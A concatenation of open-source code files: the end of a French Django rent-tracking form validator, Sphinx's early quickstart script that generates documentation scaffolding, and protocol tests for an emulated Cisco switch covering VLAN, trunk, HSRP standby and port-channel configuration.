(self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
self._errors["etat_suivi"] = self.error_class([msg])
def validate_dates(self):
date_paiement = self.cleaned_data.get("date_paiement")
date_paiement_reel = self.cleaned_data.get("date_paiement_reel")
if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
self._errors["date_paiement_reel"] = self.error_class([msg])
|
verpoorten/immobilier
|
main/forms/suivi.py
|
Python
|
agpl-3.0
| 3,478
| 0.004037
|
# -*- coding: utf-8 -*-
"""
sphinx.quickstart
~~~~~~~~~~~~~~~~~
Quickly setup documentation source to work with Sphinx.
:copyright: 2008 by Georg Brandl.
:license: BSD.
"""
import sys, os, time
from os import path
from sphinx.util import make_filename
from sphinx.util.console import purple, bold, red, nocolor
PROMPT_PREFIX = '> '
QUICKSTART_CONF = '''\
# -*- coding: utf-8 -*-
#
# %(project)s documentation build configuration file, created by
# sphinx-quickstart on %(now)s.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [%(extensions)s]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['%(dot)stemplates']
# The suffix of source filenames.
source_suffix = '%(suffix)s'
# The master toctree document.
master_doc = '%(master)s'
# General substitutions.
project = %(project)r
copyright = '%(year)s, %(author)s'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '%(version)s'
# The full version, including alpha/beta/rc tags.
release = '%(release)s'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%%B %%d, %%Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['%(dot)sstatic']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Build finished; now you can run HTML Help Workshop with the" \\
\t ".hhp project file in %(rbuilddir)s/htmlhelp."
latex:
\tmkdir -p %(rbuilddir)s/latex %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) %(rbuilddir)s/latex
\t@echo
\t@echo "Build finished; the LaTeX files are in %(rbuilddir)s/latex."
\t@echo "Run \\`make all-pdf' or \\`make all-ps' in that directory to" \\
\t "run these through (pdf)latex."
changes:
\tmkdir -p %(rbuilddir)s/changes %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) %(rbuilddir)s/changes
\t@echo
\t@echo "The overview file is in %(rbuilddir)s/changes."
linkcheck:
\tmkdir -p %(rbuilddir)s/linkcheck %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) %(rbuilddir)s/linkcheck
\t@echo
\t@echo "Link check complete; look for any errors in the above output " \\
\t "or in %(rbuilddir)s/linkcheck/output.txt."
'''
def mkdir_p(dir):
if path.isdir(dir):
return
os.makedirs(dir)
def is_path(x):
"""Please enter a valid path name."""
return path.isdir(x) or not path.exists(x)
def nonempty(x):
"""Please enter some text."""
return len(x)
def choice(*l):
def val(x):
return x in l
val.__doc__ = 'Please enter one of %s.' % ', '.join(l)
return val
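# A hedged illustration (the prompt key and values here are hypothetical, not
# used by this script): the closure's __doc__ doubles as the error message
# shown by do_prompt when validation fails, e.g.
#
#     do_prompt(d, 'builder', 'Default builder', 'html',
#               choice('html', 'latex'))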
def boolean(x):
"""Please enter either 'y' or 'n'."""
return x.upper() in ('Y', 'YES', 'N', 'NO')
def suffix(x):
"""Please enter a file suffix, e.g. '.rst' or '.txt'."""
return x[0:1] == '.' and len(x) > 1
def ok(x):
return True
def do_prompt(d, key, text, default=None, validator=nonempty):
while True:
if default:
prompt = purple(PROMPT_PREFIX + '%s [%s]: ' % (text, default))
else:
prompt = purple(PROMPT_PREFIX + text + ': ')
x = raw_input(prompt)
if default and not x:
x = default
if validator and not validator(x):
print red(" * " + validator.__doc__)
continue
break
d[key] = x
def inner_main(args):
d = {}
if os.name == 'nt' or not sys.stdout.isatty():
nocolor()
print bold('Welcome to the Sphinx quickstart utility.')
print '''
Please enter values for the following settings (just press Enter to
accept a default value, if one is given in brackets).'''
print '''
Enter the root path for documentation.'''
do_prompt(d, 'path', 'Root path for the documentation', '.', is_path)
print '''
You have two options for placing the build directory for Sphinx output.
Either, you use a directory ".build" within the root path, or you separate
"source" and "build" directories within the root path.'''
do_prompt(d, 'sep', 'Separate source and build directories (y/N)', 'n',
boolean)
print '''
Inside the root directory, two more directories will be created; ".templates"
for custom HTML templates and ".static" for custom stylesheets and other
static files. Since the leading dot may be inconvenient for Windows users,
you can enter another prefix (such as "_") to replace the dot.'''
do_prompt(d, 'dot', 'Name prefix for templates and static dir', '.', ok)
print '''
The project name will occur in several places in the built documentation.'''
do_prompt(d, 'project', 'Project name')
do_prompt(d, 'author', 'Author name(s)')
print '''
Sphinx has the notion of a "version" and a "release" for the
software. Each version can have multiple releases. For example, for
Python the version is something like 2.5 or 3.0, while the release is
something like 2.5.1 or 3.0a1. If you don't need this dual structure,
just set both to the same value.'''
do_prompt(d, 'version', 'Project version')
do_prompt(d, 'release', 'Project release', d['version'])
print '''
The file name suffix for source files. Commonly, this is either ".txt"
or ".rst". Only files with this suffix are considered documents.'''
do_prompt(d, 'suffix', 'Source file suffix', '.rst', suffix)
print '''
One document is special in that it is considered the top node of the
"contents tree", that is, it is the root of the hierarchical structure
of the documents. Normally, this is "index", but if your "index"
document is a custom template, you can also set this to another filename.'''
do_prompt(d, 'master', 'Name of your master document (without suffix)',
'index')
print '''
Please indicate if you want to use one of the following Sphinx extensions:'''
do_prompt(d, 'ext_autodoc', 'autodoc: automatically insert docstrings '
'from modules (y/N)', 'n', boolean)
do_prompt(d, 'ext_doctest', 'doctest: automatically test code snippets '
'in doctest blocks (y/N)', 'n', boolean)
print '''
If you are under Unix, a Makefile can be generated for you so that you
only have to run e.g. `make html' instead of invoking sphinx-build
directly.'''
do_prompt(d, 'makefile', 'Create Makefile? (Y/n)',
os.name == 'posix' and 'y' or 'n', boolean)
d['project_fn'] = make_filename(d['project'])
d['year'] = time.strftime('%Y')
d['now'] = time.asctime()
d['underline'] = len(d['project']) * '='
d['extensions'] = ', '.join(
repr('sphinx.ext.' + name) for name in ('autodoc', 'doctest')
if d['ext_' + name].upper() in ('Y', 'YES'))
if not path.isdir(d['path']):
mkdir_p(d['path'])
separate = d['sep'].upper() in ('Y', 'YES')
srcdir = separate and path.join(d['path'], 'source') or d['path']
mkdir_p(srcdir)
if separate:
builddir = path.join(d['path'], 'build')
else:
builddir = path.join(srcdir, d['dot'] + 'build')
mkdir_p(builddir)
mkdir_p(path.join(srcdir, d['dot'] + 'templates'))
mkdir_p(path.join(srcdir, d['dot'] + 'static'))
f = open(path.join(srcdir, 'conf.py'), 'w')
f.write(QUICKSTART_CONF % d)
f.close()
masterfile = path.join(srcdir, d['master'] + d['suffix'])
f = open(masterfile, 'w')
f.write(MASTER_FILE % d)
f.close()
create_makefile = d['makefile'].upper() in ('Y', 'YES')
if create_makefile:
d['rsrcdir'] = separate and 'source' or '.'
d['rbuilddir'] = separate and 'build' or d['dot'] + 'build'
f = open(path.join(d['path'], 'Makefile'), 'w')
f.write(MAKEFILE % d)
f.close()
print
print bold('Finished: An initial directory structure has been created.')
print '''
You should now populate your master file %s and create other documentation
source files. Use the sphinx-build script to build the docs, like so:
''' % masterfile + (create_makefile and '''
make <builder>
''' or '''
sphinx-build -b <builder> %s %s
''' % (srcdir, builddir))
def main(argv=sys.argv):
try:
return inner_main(argv)
except (KeyboardInterrupt, EOFError):
print
print '[Interrupted.]'
return
|
creasyw/IMTAphy
|
documentation/doctools/tags/0.4.2/sphinx/quickstart.py
|
Python
|
gpl-2.0
| 15,064
| 0.001062
|
# Copyright 2015-2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from tests.cisco import enable, create_interface_vlan, configuring, configuring_interface_vlan, \
assert_interface_configuration, remove_vlan, create_vlan, set_interface_on_vlan, configuring_interface, \
revert_switchport_mode_access, create_port_channel_interface, configuring_port_channel
from tests.util.protocol_util import SshTester, TelnetTester, with_protocol, ProtocolTest
class TestCiscoSwitchProtocol(ProtocolTest):
__test__ = False
test_switch = "cisco"
@with_protocol
def test_enable_command_requires_a_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
@with_protocol
def test_wrong_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("hello_world")
t.readln("% Access denied")
t.readln("")
t.read("my_switch>")
@with_protocol
def test_no_password_works_for_legacy_reasons(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("")
t.read("my_switch#")
@with_protocol
def test_exiting_loses_the_connection(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
t.write("exit")
t.read_eof()
@with_protocol
def test_no_such_command_return_to_prompt(self, t):
enable(t)
t.write("shizzle")
t.readln("No such command : shizzle")
t.read("my_switch#")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_failing(self, t, read_tftp):
read_tftp.side_effect = Exception("Stuff")
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write("gneh")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Error opening tftp://1.2.3.4/my-file (Timed out)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_success(self, t, read_tftp):
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write_raw("\r")
t.wait_for("\r\n")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Done (or some official message...)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
def test_command_show_run_int_vlan_empty(self, t):
enable(t)
t.write("terminal length 0")
t.read("my_switch#")
t.write("show run vlan 120")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_command_add_vlan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan 123")
t.read("my_switch(config-vlan)#")
t.write("name shizzle")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
t.write("show run vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("!")
t.readln("vlan 123")
t.readln(" name shizzle")
t.readln("end")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "123")
t.write("show running-config vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.read("")
@with_protocol
def test_command_assign_access_vlan_to_port(self, t):
enable(t)
create_vlan(t, "123")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport access vlan 123",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport access vlan")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport mode access")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
"end"])
remove_vlan(t, "123")
@with_protocol
def test_show_vlan_brief(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan brief")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_show_vlan(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.readln("")
t.readln("VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2")
t.readln("---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------")
t.readln("1 enet 100001 1500 - - - - - 0 0")
t.readln("123 enet 100123 1500 - - - - - 0 0")
t.readln("2222 enet 102222 1500 - - - - - 0 0")
t.readln("3333 enet 103333 1500 - - - - - 0 0")
t.readln("")
t.readln("Remote SPAN VLANs")
t.readln("------------------------------------------------------------------------------")
t.readln("")
t.readln("")
t.readln("Primary Secondary Type Ports")
t.readln("------- --------- ----------------- ------------------------------------------")
t.readln("")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_shutting_down(self, t):
enable(t)
configuring_interface(t, "FastEthernet 0/3", do="shutdown")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" shutdown",
"end"])
configuring_interface(t, "FastEthernet 0/3", do="no shutdown")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_configure_trunk_port(self, t):
enable(t)
configuring_interface(t, "Fa0/3", do="switchport mode trunk")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
# not really added because all vlan are in trunk by default on cisco
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan none")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan none",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 124,126-128")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123,124,126-128",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan remove 123-124,127")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 126,128",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan all")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan 123-124,127")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123,124,127",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="no switchport trunk allowed vlan")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="no switchport mode")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_configure_native_vlan(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/2", do="switchport trunk native vlan 555")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" switchport trunk native vlan 555",
"end"])
configuring_interface(t, "FastEthernet0/2", do="no switchport trunk native vlan")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_setup_an_interface(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do="description hey ho")
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.2 255.255.255.0")
configuring_interface_vlan(t, "2999", do="standby 1 ip 1.1.1.1")
configuring_interface_vlan(t, "2999", do='standby 1 timers 5 15')
configuring_interface_vlan(t, "2999", do='standby 1 priority 110')
configuring_interface_vlan(t, "2999", do='standby 1 preempt delay minimum 60')
configuring_interface_vlan(t, "2999", do='standby 1 authentication VLAN2999')
configuring_interface_vlan(t, "2999", do='standby 1 track 10 decrement 50')
configuring_interface_vlan(t, "2999", do='standby 1 track 20 decrement 50')
configuring_interface_vlan(t, "2999", do='no ip proxy-arp')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 1.1.1.2 255.255.255.0",
" no ip proxy-arp",
" standby 1 ip 1.1.1.1",
" standby 1 timers 5 15",
" standby 1 priority 110",
" standby 1 preempt delay minimum 60",
" standby 1 authentication VLAN2999",
" standby 1 track 10 decrement 50",
" standby 1 track 20 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "2999", do="standby 1 ip 2.2.2.1")
configuring_interface_vlan(t, "2999", do="standby 1 ip 2.2.2.3 secondary")
configuring_interface_vlan(t, "2999", do="no standby 1 authentication")
configuring_interface_vlan(t, "2999", do="standby 1 preempt delay minimum 42")
configuring_interface_vlan(t, "2999", do="no standby 1 priority")
configuring_interface_vlan(t, "2999", do="no standby 1 timers")
configuring_interface_vlan(t, "2999", do="no standby 1 track 10")
configuring_interface_vlan(t, "2999", do="ip proxy-arp")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 ip 2.2.2.1",
" standby 1 ip 2.2.2.3 secondary",
" standby 1 preempt delay minimum 42",
" standby 1 track 20 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 ip 2.2.2.3")
configuring_interface_vlan(t, "2999", do="no standby 1 preempt delay")
configuring_interface_vlan(t, "2999", do="no standby 1 track 20")
configuring_interface_vlan(t, "2999", do="")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 ip 2.2.2.1",
" standby 1 preempt",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 ip 2.2.2.1")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 preempt",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1")
configuring_interface_vlan(t, "2999", do="no description")
configuring_interface_vlan(t, "2999", do="")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 2.2.2.2 255.255.255.0",
"end"])
configuring(t, do="no interface vlan 2999")
t.write("show run int vlan 2999")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "2999")
@with_protocol
def test_partial_standby_properties(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do='standby 1 timers 5 15')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 timers 5 15",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 timers")
configuring_interface_vlan(t, "2999", do='standby 1 priority 110')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 priority 110",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 priority")
configuring_interface_vlan(t, "2999", do='standby 1 preempt delay minimum 60')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 preempt delay minimum 60",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 preempt")
configuring_interface_vlan(t, "2999", do='standby 1 authentication VLAN2999')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 authentication VLAN2999",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 authentication")
configuring_interface_vlan(t, "2999", do='standby 1 track 10 decrement 50')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 track 10 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 track 10")
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_partial_standby_ip_definition(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do='standby 1 ip')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 ip",
"end"])
configuring_interface_vlan(t, "2999", do='no standby 1 ip')
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 1..1.1")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 1.1.1.1")
t.readln("% Warning: address is not within a subnet on this interface")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.2 255.255.255.0")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 2.1.1.1")
t.readln("% Warning: address is not within a subnet on this interface")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "2999", do='standby 1 ip 1.1.1.1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 1.1.1.2 255.255.255.0",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do='standby 1 ip')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 1.1.1.2 255.255.255.0",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do="no ip address 1.1.1.2 255.255.255.0")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do='no standby 1 ip 1.1.1.1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_creating_a_port_channel(self, t):
enable(t)
create_port_channel_interface(t, '1')
configuring_port_channel(t, '1', 'description HELLO')
configuring_port_channel(t, '1', 'switchport trunk encapsulation dot1q')
configuring_port_channel(t, '1', 'switchport trunk native vlan 998')
configuring_port_channel(t, '1', 'switchport trunk allowed vlan 6,4087-4089,4091,4093')
configuring_port_channel(t, '1', 'switchport mode trunk')
